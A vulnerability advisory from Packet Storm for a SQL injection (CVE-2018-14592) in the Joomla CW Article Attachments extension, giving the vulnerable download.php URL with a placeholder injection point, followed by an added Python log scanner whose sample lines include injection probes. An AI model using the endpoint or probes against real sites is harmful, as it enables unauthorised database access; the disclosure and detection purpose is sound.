Joomla CW Article Attachments 1.0.6 SQL Injection

2018-09-24T00:00:00
ID PACKETSTORM:149482
Type packetstorm
Reporter Haboob Team
Modified 2018-09-24T00:00:00

Description

                                        
```
# Exploit Title: Joomla! CW Article Attachments 1.0.6 - 'id' SQL Injection
# Date: 2018-09-20
# Exploit Author: Haboob Team
# Software Link: https://extensions.joomla.org/extension/cw-article-attachments/
# Version: below < 1.0.6
# CVE : CVE-2018-14592
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14592

# 1. Description
# The CWJoomla CW Article Attachments PRO extension before 2.0.7 and CW Article Attachments
# FREE extension before 1.0.6 for Joomla! allow SQL Injection within download.php.

# 2. Proof of Concept

http://IP-ADDRESS/plugins/content/cwattachments/cwattachments/helpers/download.php?id=INJECTION&sid=0123456789987654321
```
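For defenders reviewing web server logs for probing of this endpoint, the following added example (not part of the original advisory or the extension's code) flags requests to the `download.php` path from the proof of concept whose `id` is not a plain decimal integer. That a legitimate `id` is always numeric is an assumption; the log lines are constructed samples, and `suspicious_id` and `scan` are hypothetical names.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Path taken from the advisory's proof-of-concept URL.
VULN_PATH = "/plugins/content/cwattachments/cwattachments/helpers/download.php"
# Request field of a combined-format access log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate attachment id is a short decimal integer.
NUMERIC_ID = re.compile(r"[0-9]{1,10}")

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Sep/2018:10:00:00 +0000] "GET ' + VULN_PATH
    + '?id=12&sid=0123456789987654321 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [24/Sep/2018:10:01:00 +0000] "GET ' + VULN_PATH
    + '?id=INJECTION&sid=0123456789987654321 HTTP/1.1" 200 0',
    '198.51.100.7 - - [24/Sep/2018:10:01:05 +0000] "GET /joomla' + VULN_PATH
    + '?id=12%27&sid=0123456789987654321 HTTP/1.1" 500 0',
    '203.0.113.5 - - [24/Sep/2018:10:02:00 +0000] "GET ' + VULN_PATH
    + '?id=3&id=4 HTTP/1.1" 200 0',
    '192.0.2.10 - - [24/Sep/2018:10:03:00 +0000] "GET /index.php?id=abc HTTP/1.1" 200 900',
]

def suspicious_id(target):
    """Return the offending id value for a request target, or None if it looks normal."""
    parts = urlsplit(target)
    # endswith() also matches Joomla installed in a subdirectory.
    if not unquote(parts.path).lower().endswith(VULN_PATH):
        return None
    # parse_qs percent-decodes values; keep_blank_values keeps an empty "id=" visible.
    values = parse_qs(parts.query, keep_blank_values=True).get("id", [])
    for value in values:
        if not NUMERIC_ID.fullmatch(value):
            return value
    # A repeated id parameter is unusual enough to review as well.
    return ",".join(values) if len(values) > 1 else None

def scan(lines):
    """Return (client_ip, id_value) for every log line that should be reviewed."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        bad = suspicious_id(match.group(1)) if match else None
        if bad is not None:
            hits.append((line.split(" ", 1)[0], bad))
    return hits

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"review: {ip} sent id={value!r}")
```

A hit only marks a request for review; the fix is upgrading to the patched releases named in the advisory (FREE 1.0.6, PRO 2.0.7).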